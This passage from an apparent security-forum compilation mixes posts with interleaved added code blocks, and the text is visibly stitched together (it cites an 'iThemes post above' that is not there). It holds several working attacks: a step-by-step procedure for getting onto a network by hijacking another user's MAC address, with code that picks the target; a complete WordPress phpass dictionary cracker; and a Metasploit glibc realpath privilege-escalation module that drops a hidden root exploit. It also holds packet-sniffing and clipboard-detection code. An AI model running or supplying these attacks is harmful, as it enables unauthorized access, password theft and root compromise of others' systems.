      Note that MAC address spoofing may be interpreted as an illegal activity depending on why you do it. In some cases it is certainly not illegal: recent mobile operating systems like iOS 8+ and Android 6+ automatically randomize their MAC address when searching for wireless networks to avoid being tracked. But when Aaron Swartz liberated JSTOR, MAC address spoofing was claimed as a signal of intention to commit a crime.

      How to get free access
      If the network is open, but you can't get access for some reason, you can also try spoofing the MAC address of a device that is already using the network. To the router, your device and the other device will look like one device. This can cause some minor problems if they interrupt each other, but for light browsing it usually works out fine.

      To find the MAC addresses of other devices using the network, first you need to connect to the network. You don't need to have Internet access, just a connection. First, on Mac OS run the command sudo chmod o+r /dev/bpf* once to make sure you can sniff wireless data (you need to do this again if you restart your computer). Then run the command python wifi-users.py. You should see a progress bar immediately:
        Available interfaces: en0
        Interface: en0
        SSID: nonoinflight
        Available gateways: en0
        Gateway IP: 10.0.1.1
        Gateway MAC: 00:e0:4b:22:96:d9
        100%|██████████████████████████| 1000/1000 [00:46<00:00, 21.46it/s]
        Total of 5 user(s):
        27:35:96:a8:66:7f 6359 bytes
        36:fe:83:9c:35:eb 9605 bytes
        65:01:3c:cc:20:e8 17306 bytes
        8c:6f:11:2c:f0:ee 20515 bytes
        0a:4f:b2:b8:e8:56 71541 bytes
      If there isn't much traffic on the network, it might take longer. If it's taking too long, type CTRL-C to cancel the sniffing and print whatever results are available.

      Finally, we want to spoof one of these MAC addresses. For example, in this case we would enter sudo spoof-mac set 0a:4f:b2:b8:e8:56 Wi-Fi to try spoofing the address with the most traffic (they probably have a connection). After running that command, try to access the Internet. If you don't have a connection, try the next MAC in the list. If your Internet connection drops out while using this MAC address, try disconnecting and reconnecting to the wireless network. Note that the original user of the MAC you copied may experience these same connection drop outs if you are both actively using the network.

      How it works
      wifi-users.py uses tcpdump to collect wireless packets. Then we look through these packets for any hints of the MAC address (BSSID) of our wireless network. Finally, we look for data packets that mention a user's MAC as well as the network BSSID (or the network gateway), and take note of that MAC using some amount of data. Then we sort the user's MACs by the total amount of data and print them out.

      Instead of sniffing wireless traffic, in some situations you can also use the command arp -a to get a list of MAC addresses of devices on the wireless network. Then you can either use spoof-mac to copy the address, or use ifconfig directly on Linux and OSX. For the specifics of using ifconfig look at the implementations of set_interface_mac inside SpoofMac's interfaces.py.

      This repository is dedicated to Lauren McCarthy, who has taught me the most about the art of getting a good deal.
      Source
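To make the "How it works" steps concrete, here is an added example (mine, not code from wifi-users.py or its author) that runs the same attribution logic over a constructed list of 802.11 frames: learn the BSSID from a beacon carrying our SSID, credit each data frame to the station side of the ToDS/FromDS address pair when the other side is the BSSID, drop group addresses and other networks, then rank clients by bytes. The frame dicts, client MACs and lengths are constructed for the demo; the SSID and AP MAC are the ones in the post's output. One caveat on the setup step: chmod o+r /dev/bpf* lets every local user on the Mac capture traffic until the next reboot, so running only the sniffer under sudo is the narrower option.

```python
from collections import Counter

# Constructed sample capture (not a real pcap). Each dict mimics the fields a
# sniffer reads from a Dot11 header: frame type (0 management, 1 control,
# 2 data), subtype, the ToDS/FromDS flag bits and the three address fields.
SSID = "nonoinflight"
BSSID = "00:e0:4b:22:96:d9"          # the AP's MAC, as in the post's output
OTHER_AP = "11:22:33:44:55:66"       # a neighbouring network that must be ignored
BROADCAST = "ff:ff:ff:ff:ff:ff"

SAMPLE_FRAMES = [
    # beacons (management, subtype 8): addr3 carries the BSSID, SSID element attached
    {"type": 0, "subtype": 8, "to_ds": 0, "from_ds": 0,
     "addr1": BROADCAST, "addr2": BSSID, "addr3": BSSID, "ssid": SSID, "len": 180},
    {"type": 0, "subtype": 8, "to_ds": 0, "from_ds": 0,
     "addr1": BROADCAST, "addr2": OTHER_AP, "addr3": OTHER_AP, "ssid": "neighbour", "len": 150},
    # station -> AP data frames (ToDS=1): addr1 = BSSID, addr2 = station
    {"type": 2, "subtype": 0, "to_ds": 1, "from_ds": 0,
     "addr1": BSSID, "addr2": "0a:4f:b2:b8:e8:56", "addr3": BSSID, "len": 1500},
    {"type": 2, "subtype": 0, "to_ds": 1, "from_ds": 0,
     "addr1": BSSID, "addr2": "8c:6f:11:2c:f0:ee", "addr3": BSSID, "len": 600},
    {"type": 2, "subtype": 0, "to_ds": 1, "from_ds": 0,
     "addr1": BSSID, "addr2": "36:fe:83:9c:35:eb", "addr3": BSSID, "len": 64},
    # AP -> station data frame (FromDS=1): addr1 = station, addr2 = BSSID
    {"type": 2, "subtype": 0, "to_ds": 0, "from_ds": 1,
     "addr1": "0a:4f:b2:b8:e8:56", "addr2": BSSID, "addr3": BSSID, "len": 1500},
    # AP -> broadcast: no single client to credit
    {"type": 2, "subtype": 0, "to_ds": 0, "from_ds": 1,
     "addr1": BROADCAST, "addr2": BSSID, "addr3": BSSID, "len": 100},
    # traffic on the neighbouring network: wrong BSSID, ignored
    {"type": 2, "subtype": 0, "to_ds": 1, "from_ds": 0,
     "addr1": OTHER_AP, "addr2": "de:ad:be:ef:00:01", "addr3": OTHER_AP, "len": 900},
    # an ACK (control frame) addressed to a client: not data, ignored
    {"type": 1, "subtype": 13, "to_ds": 0, "from_ds": 0,
     "addr1": "0a:4f:b2:b8:e8:56", "addr2": None, "addr3": None, "len": 14},
]


def is_unicast(mac):
    """True unless the group bit (least significant bit of the first octet) is set."""
    return mac is not None and int(mac.split(":")[0], 16) & 1 == 0


def find_bssid(frames, ssid):
    """Learn the BSSID from the first beacon advertising our SSID."""
    for f in frames:
        if f["type"] == 0 and f["subtype"] == 8 and f.get("ssid") == ssid:
            return f["addr3"]
    return None


def client_of(frame, bssid):
    """Return the station MAC a data frame should be credited to, or None."""
    if frame["type"] != 2:
        return None
    if frame["to_ds"] and not frame["from_ds"] and frame["addr1"] == bssid:
        station = frame["addr2"]          # station -> AP
    elif frame["from_ds"] and not frame["to_ds"] and frame["addr2"] == bssid:
        station = frame["addr1"]          # AP -> station
    else:
        return None                       # IBSS/WDS traffic or another network
    return station if is_unicast(station) else None


def rank_clients(frames, ssid):
    """Bytes per client on the given SSID, least busy first (as the post prints)."""
    bssid = find_bssid(frames, ssid)
    if bssid is None:
        return []
    usage = Counter()
    for f in frames:
        station = client_of(f, bssid)
        if station:
            usage[station] += f["len"]
    return sorted(usage.items(), key=lambda kv: kv[1])


def pick_target(frames, ssid):
    """The MAC with the most traffic, i.e. the one most likely to hold a live session."""
    ranked = rank_clients(frames, ssid)
    return ranked[-1][0] if ranked else None


if __name__ == "__main__":
    for mac, nbytes in rank_clients(SAMPLE_FRAMES, SSID):
        print("%s %6d bytes" % (mac, nbytes))
    print("target:", pick_target(SAMPLE_FRAMES, SSID))
```

With real captures the only change is the frame source: read the type/subtype, FCfield bits and addr1-3 off each Dot11 layer instead of the dicts above.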
  19. @sergiu4995 https://github.com/kylemcdonald/FaceTracker

edit: you can try Face Substitution by Kyle McDonald

References:
https://www.auduno.com/clmtrackr/examples/facesubstitution.html
https://github.com/kylemcdonald
http://kylemcdonald.net/
  20. The IT security researchers at Qihoo 360 Total Security have discovered a new malware aimed at stealing cryptocurrencies, including Bitcoin and Ethereum, from the computer systems of unsuspecting users.

Dubbed ClipboardWalletHijacker by researchers, the malware targets Windows-based devices and is currently installed on over 300,000 devices. As indicated by its name, the malware monitors clipboard activity to identify what kind of cryptocurrencies the victim has stored in their wallet. In case the malware finds Bitcoin and Ethereum addresses, it replaces them with the ones used by the cybercriminals behind the campaign.

So far ClipboardWalletHijacker has stolen over 5 Bitcoin, while its last activity was detected on June 12th, 2018, indicating that the malware is still active and stealing funds.

Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims' cryptocurrencies. "We strongly recommend users to enable antivirus software while installing new applications", said the company in their blog post.

ClipboardWalletHijacker's ability to replace wallet addresses by monitoring clipboard activity is not new; previously, the CryptoShuffler Trojan was found following the same method to steal mainstream cryptocurrencies including Dash, Monero, Ethereum, Bitcoin, and Zcash. In March this year, researchers spotted ComboJack malware, which actively steals cryptocurrency by modifying victims' addresses. Moreover, the Evrial and Coinbitclip trojans were also caught monitoring the clipboard activities of their victims to steal funds by replacing their wallet addresses.

If you are investing in cryptocurrency, make sure your system is secure and your funds are properly protected. Additionally, cryptocurrency users are advised to avoid using online wallets to store their funds and move to hardware wallets. Here is a list of 5 secure Bitcoin wallets which you can trust.

In January this year, researchers warned Internet proxy users to watch out for Tor Proxy since its owners were found replacing Bitcoin payment addresses to divert payments from ransomware victims to their own wallets.

Via hackread.com
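The detection side of what the article describes, as an added example (mine, not from the article, Qihoo 360 or any of the malware families named): classify clipboard contents as a Bitcoin or Ethereum address by shape, and raise an alert when the clipboard later holds a different address of the same kind than the one the user copied, with no user copy in between. The event list simulates a copy hook plus a periodic clipboard poller; every address except the bech32 test vector is a constructed string.

```python
import re

# Address shapes for the two currencies the article names. Legacy/P2SH Bitcoin
# addresses are Base58 (no 0, O, I, l), bech32 ones are bc1 plus the bech32
# alphabet, Ethereum addresses are 0x plus 40 hex digits. Shape only: no
# checksum validation, which is enough to spot a substituted address.
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{25,62})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_kind(text):
    """'btc', 'eth' or None for the given clipboard text."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def detect_swaps(events):
    """events: sequence of (source, content) clipboard snapshots.
    'copy' is content the user put there (seen e.g. through a Ctrl+C hook);
    'poll' is what a periodic read of the clipboard returned afterwards.
    A hijack shows up as a polled address of the same kind as the last user
    copy but with a different value. Returns (kind, expected, observed) tuples."""
    alerts = []
    expected = None  # (kind, address) from the most recent user copy
    for source, content in events:
        kind = address_kind(content)
        if source == "copy":
            expected = (kind, content.strip()) if kind else None
        elif source == "poll" and expected and kind == expected[0] \
                and content.strip() != expected[1]:
            alerts.append((kind, expected[1], content.strip()))
            expected = None  # report each substitution once
    return alerts


# Constructed addresses and event stream for the demo.
VICTIM_BTC = "1" + "Victim" * 5
ATTACKER_BTC = "1" + "Attacker" * 4
VICTIM_ETH = "0x" + "ab" * 20
ATTACKER_ETH = "0x" + "cd" * 20

SAMPLE_EVENTS = [
    ("copy", "meeting notes"), ("poll", "meeting notes"),
    ("copy", VICTIM_BTC), ("poll", VICTIM_BTC), ("poll", ATTACKER_BTC),
    ("copy", VICTIM_ETH), ("poll", ATTACKER_ETH),
    ("copy", VICTIM_BTC), ("poll", VICTIM_BTC),   # untouched copy: no alert
]

if __name__ == "__main__":
    for kind, expected, observed in detect_swaps(SAMPLE_EVENTS):
        print("%s address swapped: copied %s, clipboard now %s" % (kind, expected, observed))
```

On a real host the same function is fed from a clipboard hook and a poller; the point of keeping the user's own copy as the reference is that a hijacker can only be seen by comparing what was copied with what is about to be pasted.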
  21. Scapy is an incredible tool when it comes to playing with the network. As it is written on its official website, Scapy can replace a majority of network tools such as nmap, hping and tcpdump. One of the features offered by Scapy is to sniff the network packets passing through a computer's NIC. Below is a small example:

    from scapy.all import *

    interface = "eth0"

    def print_packet(packet):
        ip_layer = packet.getlayer(IP)
        print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    print("[*] Start sniffing...")
    sniff(iface=interface, filter="ip", prn=print_packet)
    print("[*] Stop sniffing")

This little sniffer displays the source and the destination of all packets having an IP layer:

    $ sudo python3 sniff_main_thread.py
    [*] Start sniffing...
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    ^C[*] Stop sniffing

It will continue to sniff network packets until it receives a keyboard interruption (CTRL+C). Now, let's look at a new example:

    from scapy.all import *
    from threading import Thread
    from time import sleep

    class Sniffer(Thread):
        def __init__(self, interface="eth0"):
            super().__init__()
            self.interface = interface

        def run(self):
            sniff(iface=self.interface, filter="ip", prn=self.print_packet)

        def print_packet(self, packet):
            ip_layer = packet.getlayer(IP)
            print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    sniffer = Sniffer()

    print("[*] Start sniffing...")
    sniffer.start()

    try:
        while True:
            sleep(100)
    except KeyboardInterrupt:
        print("[*] Stop sniffing")
        sniffer.join()

This piece of code does exactly the same thing as the previous one except that this time the sniff function is executed inside a dedicated thread. Everything works well with this new version except when it comes to stopping the sniffer:

    $ sudo python3 sniff_thread_issue.py
    [*] Start sniffing...
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.30 -> 10.137.2.1
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.1 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    [!] New Packet: 216.58.198.68 -> 10.137.2.30
    [!] New Packet: 10.137.2.30 -> 216.58.198.68
    ^C[*] Stop sniffing
    ^CTraceback (most recent call last):
      File "sniff_thread_issue.py", line 25, in <module>
        sleep(100)
    KeyboardInterrupt

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "sniff_thread_issue.py", line 28, in <module>
        sniffer.join()
      File "/usr/lib/python3.5/threading.py", line 1054, in join
        self._wait_for_tstate_lock()
      File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock
        elif lock.acquire(block, timeout):
    KeyboardInterrupt
    ^CException ignored in: <module 'threading' from '/usr/lib/python3.5/threading.py'>
    Traceback (most recent call last):
      File "/usr/lib/python3.5/threading.py", line 1288, in _shutdown
        t.join()
      File "/usr/lib/python3.5/threading.py", line 1054, in join
        self._wait_for_tstate_lock()
      File "/usr/lib/python3.5/threading.py", line 1070, in _wait_for_tstate_lock
        elif lock.acquire(block, timeout):
    KeyboardInterrupt

When CTRL+C is pressed, a SIGTERM signal is sent to the process executing the Python script, triggering its exit routine. However, as said in the official documentation about signals, only the main thread receives signals:

As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception. The sniffing thread will continue its infinite sniffing loop, blocking at the same time the call of sniffer.join(). So, how can the sniffing thread be stopped if not by signals? Let's have a look at this next example:

    from scapy.all import *
    from threading import Thread, Event
    from time import sleep

    class Sniffer(Thread):
        def __init__(self, interface="eth0"):
            super().__init__()
            self.interface = interface
            self.stop_sniffer = Event()

        def run(self):
            # stop_filter is consulted after every captured packet
            sniff(iface=self.interface, filter="ip", prn=self.print_packet,
                  stop_filter=self.should_stop_sniffer)

        def join(self, timeout=None):
            self.stop_sniffer.set()
            super().join(timeout)

        def should_stop_sniffer(self, packet):
            return self.stop_sniffer.is_set()

        def print_packet(self, packet):
            ip_layer = packet.getlayer(IP)
            print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    sniffer = Sniffer()

    print("[*] Start sniffing...")
    sniffer.start()

    try:
        while True:
            sleep(100)
    except KeyboardInterrupt:
        print("[*] Stop sniffing")
        sniffer.join()

As you may have noticed, we are now using the stop_filter parameter in the sniff function call. This parameter expects to receive a function which will be called after each new packet to evaluate if the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose. It is set to true when the join method is called to stop the thread. Is this the end of the story? Not really…

    $ sudo python3 sniff_thread_issue_2.py
    [*] Start sniffing...
    ^C[*] Stop sniffing
    [!] New Packet: 10.137.2.30 -> 10.137.2.1

One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer will continue its job, going back to its infinite sniffing loop. This is why the sniffer stopped one packet ahead of the keyboard interruption. A solution would be to force the sniffing thread to stop. As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose:

However, even if this solution would work, the thread won't release the resources it might hold:

The sniff function uses a socket which is released just before exiting, after the sniffing loop:

    try:
        while sniff_sockets:
            # sniffing loop
    except KeyboardInterrupt:
        pass
    if opened_socket is None:
        for s in sniff_sockets:
            s.close()
    return plist.PacketList(lst,"Sniffed")

Therefore, the solution I suggest is to open the socket outside the sniff function and to give it to this last one as parameter. Consequently, it would be possible to force-stop the sniffing thread while closing its socket properly:

    from scapy.all import *
    from threading import Thread, Event
    from time import sleep

    class Sniffer(Thread):
        def __init__(self, interface="eth0"):
            super().__init__()
            self.daemon = True          # let the interpreter exit even if run() is still blocked
            self.socket = None
            self.interface = interface
            self.stop_sniffer = Event()

        def run(self):
            # open the capture socket ourselves so the main thread can close it
            self.socket = conf.L2listen(
                type=ETH_P_ALL,
                iface=self.interface,
                filter="ip"
            )
            sniff(
                opened_socket=self.socket,
                prn=self.print_packet,
                stop_filter=self.should_stop_sniffer
            )

        def join(self, timeout=None):
            self.stop_sniffer.set()
            super().join(timeout)

        def should_stop_sniffer(self, packet):
            return self.stop_sniffer.is_set()

        def print_packet(self, packet):
            ip_layer = packet.getlayer(IP)
            print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))

    sniffer = Sniffer()

    print("[*] Start sniffing...")
    sniffer.start()

    try:
        while True:
            sleep(100)
    except KeyboardInterrupt:
        print("[*] Stop sniffing")
        sniffer.join(2.0)

        if sniffer.is_alive():
            # still blocked in sniff(): release the socket from here
            sniffer.socket.close()

Et voilà! The sniffing thread now waits for 2 seconds after having received a keyboard interrupt, letting the time to the sniff function to terminate its job by itself, after which the sniffing thread will be force-stopped and its socket properly closed from the main thread.

Source
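The stopping problem in this post comes down to two things: CTRL+C reaches the process as SIGINT, which Python turns into KeyboardInterrupt in the main thread only, and a worker blocked in a read never looks at a flag until that read returns. The added example below (mine, written with plain sockets rather than scapy, and not code from the post) shows the pattern that serves any blocking reader: an Event that stop() sets, plus a short read timeout so the loop re-checks the Event even when no packet arrives, which is exactly the gap the stop_filter version leaves. It listens on a loopback UDP socket so it runs without root or a network interface; the datagram it receives is constructed.

```python
import socket
import threading
import time


class StoppableSniffer(threading.Thread):
    """Worker that blocks on a loopback UDP socket and can be stopped from the
    main thread without signals. The socket has a short read timeout, so the
    loop re-checks the Event even when nothing arrives, and the thread closes
    its own socket on the way out, so nothing is left to force-close."""

    def __init__(self, host="127.0.0.1", port=0, poll=0.1):
        super().__init__(daemon=True)
        self._stop_event = threading.Event()
        self.seen = []                      # (peer, payload) for every datagram read
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind((host, port))        # port 0: let the OS pick a free port
        self.sock.settimeout(poll)          # recvfrom() gives up every `poll` seconds

    @property
    def address(self):
        return self.sock.getsockname()

    def run(self):
        try:
            while not self._stop_event.is_set():
                try:
                    data, peer = self.sock.recvfrom(65535)
                except socket.timeout:
                    continue                # nothing arrived: loop and re-check the flag
                self.seen.append((peer, data))
        finally:
            self.sock.close()               # released by the thread that owns it

    def stop(self, timeout=None):
        """Raise the flag and wait; returns True if the thread really exited."""
        self._stop_event.set()
        self.join(timeout)
        return not self.is_alive()


def demo(payload=b"probe"):
    """Start a sniffer, send it one constructed datagram over loopback, stop it cleanly."""
    sniffer = StoppableSniffer()
    sniffer.start()
    tx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        tx.sendto(payload, sniffer.address)
    finally:
        tx.close()
    deadline = time.monotonic() + 2.0
    while not sniffer.seen and time.monotonic() < deadline:
        time.sleep(0.01)
    stopped = sniffer.stop(timeout=2.0)     # returns within about one poll interval
    return stopped, [data for _, data in sniffer.seen]


if __name__ == "__main__":
    print(demo())
```

The trade-off is latency: the worker notices the stop request within one poll interval rather than immediately, which is usually acceptable and avoids closing a socket underneath a thread that is still using it.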
  22. Dracos Linux ( www.dracos-linux.org ) is a Linux operating system from Indonesia. It is open source, built with Linux From Scratch, and released under the GNU General Public License v3.0. This operating system is a Linux distribution used to perform security testing (penetration testing). Dracos Linux is armed with hundreds of pentest, forensics and reverse engineering tools. It does not use GUI-based tools and only ships software that uses the CLI (command line interface) to perform its operations. Dracos is currently at version 2.0, code name "Leak".

Screenshot Teaser

Development goals

Education: Dracos Linux is intended as an educational system, especially for getting to know the Linux operating system, and we respect ethical hacking.

Build from source: it has always been built from code instead of installers; this will stimulate users in Indonesia to stay creative and to build the spirit of open source.

Repository: even though it is mostly built from code, Dracos Linux still intends to maintain a repository to speed up the process, like Venomizer.

Heavy control: we need to acknowledge that this operating system is very difficult, because Dracos is built from source code, which forces us to compile when installing a package or software; this of course raises the possibility of system failures and other system vulnerabilities.

Always from terminal: none of the tools installed inside the OS use a GUI. The CLI will always be preferred, particularly with Openbox, to ease the users' need for multiple terminals when doing penetration testing.

Penetration Tools List
Link: http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing

Information Gathering
Vulnerability Assessment
Web Attack
Exploitation Testing
Privilege Escalation
Password Attack
Social Engineering
Man In The Middle Attack
Stress Testing
Wireless Attack
Maintaining Access
Forensics Tools
Reverse Engineering
Malware Analysis
Covering Track

Download: https://dracos-linux.org/downloads.php

Source
  23. wpCrack v1.0 - version 1.0

WordPress hash cracker

Installation

    git clone https://github.com/MrSqar-Ye/wpCrack.git

Video

Contact:
Twitter: @MrSqar
Send to my email

Source
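What a WordPress hash cracker has to implement, as an added example (mine, not wpCrack's code): WordPress stores user_pass as a portable phpass hash, "$P$" followed by one iteration-count character, 8 salt characters and 22 characters of phpass's own base64 encoding of MD5(salt + password) pushed through 2^n further rounds of MD5(previous + password). The dictionary attack is then just re-hashing each candidate with the stored salt and count and comparing. KNOWN_HASH is phpass's own published test vector for the password test12345; the wordlist is constructed.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass's private base64 variant: 3 input bytes -> 4 chars, little-endian."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return "".join(out)


def phpass_crypt(password, setting):
    """Portable phpass ($P$ / $H$) hash of `password` under the 12-char `setting`
    ("$P$" + count char + 8-char salt): MD5(salt+pw), then 2**n rounds of MD5(prev+pw)."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a portable phpass setting")
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        raise ValueError("bad iteration count")
    salt = setting[4:12]
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def check_password(password, stored):
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_crypt(password, stored[:12]), stored)


def crack(stored, wordlist):
    """Dictionary attack: first candidate whose hash matches, else None."""
    for candidate in wordlist:
        if check_password(candidate, stored):
            return candidate
    return None


# phpass's own test vector (from its test.php): the password is "test12345".
KNOWN_HASH = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"
# Constructed wordlist for the demo.
WORDLIST = ["password", "letmein", "admin123", "test12345", "wordpress"]

if __name__ == "__main__":
    print(crack(KNOWN_HASH, WORDLIST))
```

The count character is what makes this slow to crack at scale: "9" means 2^11 MD5 rounds per candidate, and WordPress uses "B" (2^13). Feeding the function real hashes means reading user_pass from wp_users, which is why the SQL injection in the iThemes post above is worth more than it looks.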
  24.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "glibc 'realpath()' Privilege Escalation",
      'Description'    => %q{
        This module attempts to gain root privileges on Linux systems by abusing
        a vulnerability in GNU C Library (glibc) version 2.26 and prior.

        This module uses halfdog's RationalLove exploit to exploit a buffer
        underflow in glibc realpath() and create a SUID root shell. The exploit
        has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.

        The target system must have unprivileged user namespaces enabled.

        This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)
        with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc
        version 2.24-11+deb9u1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'halfdog',       # Discovery and RationalLove.c exploit
          'Brendan Coles'  # Metasploit
        ],
      'DisclosureDate' => 'Jan 16 2018',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'Privileged'     => true,
      'References'     =>
        [
          [ 'AKA', 'RationalLove.c' ],
          [ 'BID', '102525' ],
          [ 'CVE', '2018-1000001' ],
          [ 'EDB', '43775' ],
          [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ],
          [ 'URL', 'https://securitytracker.com/id/1040162' ],
          [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],
          [ 'URL', 'https://usn.ubuntu.com/3534-1/' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]
        ],
      'DefaultTarget'  => 0))
    register_options [
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def upload_and_compile(path, data)
    upload "#{path}.c", data

    gcc_cmd = "gcc -w -o #{path} #{path}.c"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end
    output = cmd_exec gcc_cmd

    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end

    register_file_for_cleanup path
    cmd_exec "chmod +x #{path}"
  end

  def exploit_data(file)
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file
    fd = ::File.open path, 'rb'
    data = fd.read fd.stat.size
    fd.close
    data
  end

  def live_compile?
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

    if has_gcc?
      vprint_good 'gcc is installed'
      return true
    end

    unless datastore['COMPILE'].eql? 'Auto'
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
    end
  end

  def check
    version = kernel_release
    if Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.36')
      vprint_error "Linux kernel version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Linux kernel version #{version} is vulnerable"

    arch = kernel_hardware
    unless arch.include? 'x86_64'
      vprint_error "System architecture #{arch} is not supported"
      return CheckCode::Safe
    end
    vprint_good "System architecture #{arch} is supported"

    unless userns_enabled?
      vprint_error 'Unprivileged user namespaces are not permitted'
      return CheckCode::Safe
    end
    vprint_good 'Unprivileged user namespaces are permitted'

    version = glibc_version
    if Gem::Version.new(version.split('-').first) > Gem::Version.new('2.26')
      vprint_error "GNU C Library version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "GNU C Library version #{version} is vulnerable"

    # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1
    glibc_banner = cmd_exec('ldd --version')
    unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')
      vprint_error 'No offsets for this version of GNU C Library'
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Upload exploit executable
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    @executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile @executable_path, exploit_data('RationalLove.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx @executable_path, exploit_data('RationalLove')
    end

    # Upload payload executable
